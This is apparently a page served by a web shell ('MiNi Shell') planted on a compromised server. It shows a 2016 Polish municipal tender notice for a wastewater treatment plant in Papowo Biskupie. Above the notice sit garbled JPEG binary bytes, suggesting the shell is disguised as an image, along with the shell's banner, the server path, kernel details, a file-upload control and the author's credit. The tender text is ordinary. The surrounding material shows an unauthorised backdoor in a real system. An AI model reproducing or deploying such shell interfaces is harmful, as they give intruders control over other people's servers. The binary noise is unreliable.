JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160414/40017-N-2016.html

<p class="kh_header"><b>Papowo Biskupie: Budowa zbiorczej przydomowej oczyszczalni ścieków dla budynków socjalnych
          w miejscowości Staw.</b><br>
<b>Numer ogłoszenia: 40017 - 2016; data zamieszczenia: 14.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Papowo Biskupie , Papowo Biskupie 128, 86-221 Papowo Biskupie, woj. kujawsko-pomorskie, tel. 56 6768101, faks 56 6768101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.papowobiskupie.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa zbiorczej przydomowej oczyszczalni ścieków dla budynków socjalnych
          w miejscowości Staw..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem opracowania jest kompleksowe rozwiązanie problemu gospodarki
        ściekowej dla budynków komunalnych w miejscowości Staw, przez wybudowanie 
        lokalnej oczyszczalni biologicznej o przepustowości 5.4m3)d. 
        W oczyszczalni biologicznej ścieków zastosowano urządzenia typowe 
        typoszeregu Bio wykonane z polietylenu wysokiej gęstości.
        Ciąg technologiczny oczyszczalni składa się z następujących urządzeń:
         1)przykanalików DN 160
         2)przepompowni ścieków surowych
         3)studzienek rewizyjnych
         4)biologicznej oczyszczalni ścieków 5.4m3) d
         5)tuneli filtracyjnych -100szt.(odbiornik ścieków oczyszczonych)
        Oczyszczalnia posiada układ wentylacji wysokiej połączonej z wentylacją niską.
        Oczyszczalnia ta w części biologicznej będzie pracować w systemie hybrydowym
        wykorzystującym technologię złoża biologicznego i osadu czynnego.
        Biologiczna oczyszczalnia ścieków jest kompletnym urządzeniem realizującym
        mechaniczne i tlenowe procesy oczyszczania ścieków bytowo-gospodarczych
       pochodzących z gospodarstw domowych. Zbiorniki oczyszczalni wykonane są 
       z    polietylenu wysokiej gęstości  formowanego metodą wytłaczania z rozdmuchem.
       Podstawowe parametry projektowanej oczyszczalni ścieków:
      Wymiary zbiorników (dł.szer.wys.) (mm) 5630-5250-2220
      Masa zbiornika (kg) 1250
      Wysokość od dna do podstawy dopływu (mm)1140
      Wysokość od dna do odpływu ścieków (mm) 1060
      Średnica dopływu (mm) 160
      Średnica odpływu (mm) 160
        Powierzchnia zabudowy (m2) 29,55
        Objętość osadnika wstępnego (m3) 10,00
        Urządzenie wyposażone jest w:
          1)grawitacyjny rozdzielacz przepływu ścieków surowych
          2)cztery komory osadnikowe
          3)cztery komory czynne
          4)przyłącza wlotu i wylotu ścieków DN 160 i 160 mm
          5)przyłącza wentylacji grawitacyjnej wysokiej i niskiej DN 110 mm
          6)przyłącza do napowietrzania mechanicznego DN 18 mm
          7)dmuchawę membranową
          8)obudowy dmuchaw z zaworami powietrza o 16 mm oraz przyłączem elektrycznym
          9)wysoko powierzchniowe wypełnienie PP (złoże biologiczne)
        10)cyrkulatory wewnętrznego obiegu ścieków z napowietrzeniem (złoże biologiczne)
        11)dyfuzory napowietrzające (osad czynny)
        12)ruszty podtrzymujące
        13)włazy rewizyjne o 380 mm i o 600 mm
        14)filtry szczelinowe
  Przedmiot zamówienia należy zrealizować według następujących dokumentów:
  1)Umowa na realizację zamówienia
  2)Specyfikacja istotnych warunków zamówienia.
  3)Pozwolenie na budowę wydane przez Starostę Chełmińskiego nr 178/2015 znak:
     AABŚ.A.6740.143.2015.WS  z dnia 20.07.2015r.
         4)Dokumentacja projektowa opracowana przez EKO-BUD Agnieszka Żołędowska
      87-800 Włocławek, ul.Ziołowa 1a w tym:
     -projekt budowlany,
     -specyfikacje techniczne wykonania i odbioru robót budowlanych
     -przedmiar robót, który ma charakter pomocniczy.
  Zakres zamówienia obejmuje wykonanie między innymi:
1)	Roboty ziemne wykopy koparkami   w gruncie  kat. III - 125,40 m3
2)	Kanały z rur PVC łączonych na wcisk o śr. zewn. 160 mm- 142,00 mb
3)	Sieci wodociągowe - montaż rurociągów z rur polietylenowych (PE, PEHD) o śr. zewnętrznej 63 mm- 67,00 mb.
4)	Przeciski jednostopniowe o długości do 20 m rurami o śr.200 mm w gr. kat. III-IV - 1`0,00 mb.
5)	Studzienki kanalizacyjne systemowe o śr 315-425 mm - zamknięcie rurą teleskopową- przepływ DN  160-11.0 szt.
6)	Montaż przydomowej oczyszczalni ścieków w gotowym wykopie na zbrojonej płycie betonowej -1 kmpl.
7)	Przepompownia ścieków surowych- 1 kmpl
8)	Montaż tuneli filtracyjnych- 100 kmpl
9)	Wyloty drenarskie  (skarpy umocnione korytkami betonowymi) - 1 szt.
10)	Wentylacja z rur d=110 mm -26,00 mb.
11)	Roboty elektryczne - kmpl
12)	Inwentaryzacja geodezyjna powykonawcza - kmpl
13)	Badanie ścieków oczyszczonych - kmpl
14)	Zieleń - Sadzenie drzew i krzewów iglastych na terenie płaskim w gruncie kat. I-II - 30 szt.
15)	Ogrodzenie z siatki wysokości 1,5 m na słupkach stalowych z rur -42,00 mb.
16)	Wrota z furtkami wysokości 1.5 m szerokość wrót 3 m i furtki 1 m z siatki w ramach stalowych na gotowych słupkach bez pasa dolnego z blachy - kmpl
        Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 9 do SIWZ
       -Projekt. Poza robotami wynikającymi wprost z dokumentacji technicznej ,zamówienie
        obejmuje również wszystko to, co z technicznego punktu widzenia jest do wykonania,
        aby zrealizować przedmiot zamówienia w całości.
       Umowa na realizację obejmuje:
      -wykonanie zakresu robót ,wg dokumentacji  technicznej,
      -oznakowanie i utrzymanie oznakowania na czas prowadzenia robót
      -uporządkowanie terenu robót po ich zakończeniu i przekazanie przedmiotu zamówienia
        zamawiającemu w dniu odbioru robót,
      -opracowanie i przekazanie zamawiającemu w dniu odbioru robót dokumentacji 
       odbiorowej (powykonawcza inwentaryzacja geodezyjna atesty ,deklaracje zgodności,
       protokoły badań i sprawdzeń).
        -na żądanie zamawiającego ,Wykonawca po zakończeniu robót opracuje 
         przekaże zamawiającemu 2 egz. kosztorysu powykonawczego dla
         zrealizowanego zadania..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.21-9, 45.11.12.00-0, 45.23.24.10-9, 45.23.24.23-3, 45.25.56.00-5, 45.23.24.00-6, 45.23.13.00-8, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium-3000,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie powyższego
              warunku. Ocena tego warunku dokonana będzie na podstawie załączonego
              oświadczenia w trybie art.22 ust.1 ustawy Pzp.(załącznik nr 2 do SIWZ) .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony ,jeżeli Wykonawca wykaże ,że w ciągu
         ostatnich  pięciu lat przed upływem terminu składania ofert, a jeżeli okres
         prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej
         jedną  robotę  budowlaną, której przedmiotem zamówienia była budowa
         oczyszczalni ścieków lub przydomowych oczyszczalni ścieków w technologii
         oczyszczania złoża biologicznego i osadu czynnego o wartości minimum
         150.000,00 zł.(brutto).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie powyższego
              warunku. Ocena tego warunku dokonana będzie na podstawie załączonego
              oświadczenia w trybie art.22 ust.1 ustawy Pzp (załącznik nr 2 do SIWZ) .</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony ,jeżeli Wykonawca wykaże ,że dysponuje
    osobą  posiadającą uprawnienia budowlane w specjalności wod. kan., ochrona
    środowiska lub innymi uprawnieniami ,które w obecnym stanie prawnym
    umożliwiają kierowanie tego typu robotami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie powyższego
              warunku. Ocena tego warunku dokonana będzie na podstawie załączonego
              oświadczenia w trybie art.22 ust.1 ustawy Pzp (załącznik nr 2 do SIWZ) .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Pisemne zobowiązanie podmiotu do oddania Wykonawcy do dyspozycji 
              niezbędnych zasobów na potrzeby realizacji zamówienia jeżeli Wykonawca polega
              na zasobach innych podmiotów niezależnie od charakteru prawnego łączących go 
              z nimi stosunków. Wykonawca jest zobowiązany udowodnić zamawiającemu, że
              będzie dysponował tymi zasobami w trakcie realizacji zamówienia. Jeżeli
              Wykonawca wykazując spełnianie warunków udziału w postępowaniu będzie
             polegał na zasobach innych podmiotów, Zamawiający w celu oceny żąda
             informacji dotyczących:
             1)zakresu zasobów innego podmiotu  dostępnych wykonawcy,
             2)sposobu wykorzystania zasobów innego podmiotu przez wykonawcę przy
                realizacji zamówienia,
            3) charakteru stosunków łączących wykonawcę z innym podmiotem,
            4)zakresu i czasu trwania zasobów innego podmiotu w trakcie realizacji zamówienia.
            Do zobowiązania wykonawca winien dołączyć stosowne pełnomocnictwa.
          2. Dowód wniesienia wadium.
          3 Oświadczenie producenta urządzeń</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmianie mogą ulec:
       1) Termin zakończenia realizacji robót wynikający z:
           -przestojów i opóźnień leżących po stronie zamawiającego,
           -nagłych zdarzeń losowych mających wpływ na realizacje robót,(klęski 
            żywiołowe, itp.)
           -wystąpienia złych warunków atmosferycznych ,lub pogorszenie się warunków 
             wodno-gruntowych (fakt ten musi być potwierdzony przez  inspektora
             nadzoru),
           -koniecznością wprowadzenia zmian  w dokumentacji projektowej lub
            opracowania dokumentacji zamiennej, (fakt ten musi być potwierdzony
            przez inspektora nadzoru i autora projektu),
           -wystąpienia istotnych wad w dokumentacji projektowej ,uniemożliwiających
             terminowe zakończenie robót,
           -konieczności udzielenia zamówień dodatkowych na podstawie art.67 ust.1 
             pkt 5 ustawy PZP,
           -dodatkowe obowiązki związane z wykonywanym przedmiotem
             zamówienia nałożone na wykonawcę, a wynikające ze zmienionych 
             w trakcie wykonania umowy przepisów ustaw i rozporządzeń,
           -wystąpienia okoliczności, których strony ,mimo dołożenia należytej
             staranności  nie były w stanie przewidzieć.
         2)Wartość umowy brutto w przypadku:
             -zmiany obowiązującej stawki podatku VAT
         3) Forma wniesienia należytego zabezpieczenia wykonania umowy
         4)Podwykonawca, za zgodą Zamawiającego.  Wykonawca może zmienić
              podwykonawcę lub wprowadzić nowego podwykonawcę. Zmieniony lub
             nowy wykonawca winien spełniać warunki określone dla pierwszego
              podwykonawcy.
              Warunki zatrudnienia podwykonawcy/ów/ szczegółowo opisane są w SIWZ.
           5)Zmianie mogą ulec istotne postanowienia umowy  w stosunku do treści
             oferty na podstawie której dokonano wyboru wykonawcy w sytuacji gdy
             zajdzie inna niemożliwa do przewidzenia  w dniu zawarcia umowy
             okoliczność prawna , techniczna ,finansowa  czy organizacyjna ,za którą
             nie ponosi odpowiedzialności żadna ze stron, a  która będzie skutkowała
             niemożliwością wykonania umowy  zgodnie z treścią złożonej oferty.
             Szczególnie w takiej sytuacji może ulec  termin wykonania umowy.
             Strona, która występuje z propozycją zmiany umowy obowiązana jest pisemnie
             uzasadnić i  udokumentować  istnienie przesłanki tej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.papowobiskupie.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Papowo Biskupie ,Papowo Biskupie 128 ,86y-221 Papowo Biskupie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2016 godzina 10:00, miejsce: Urząd Gminy Papowo Biskupie ,Papowo Biskupie 128 ,86y-221 Papowo Biskupie
pok.nr 8 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com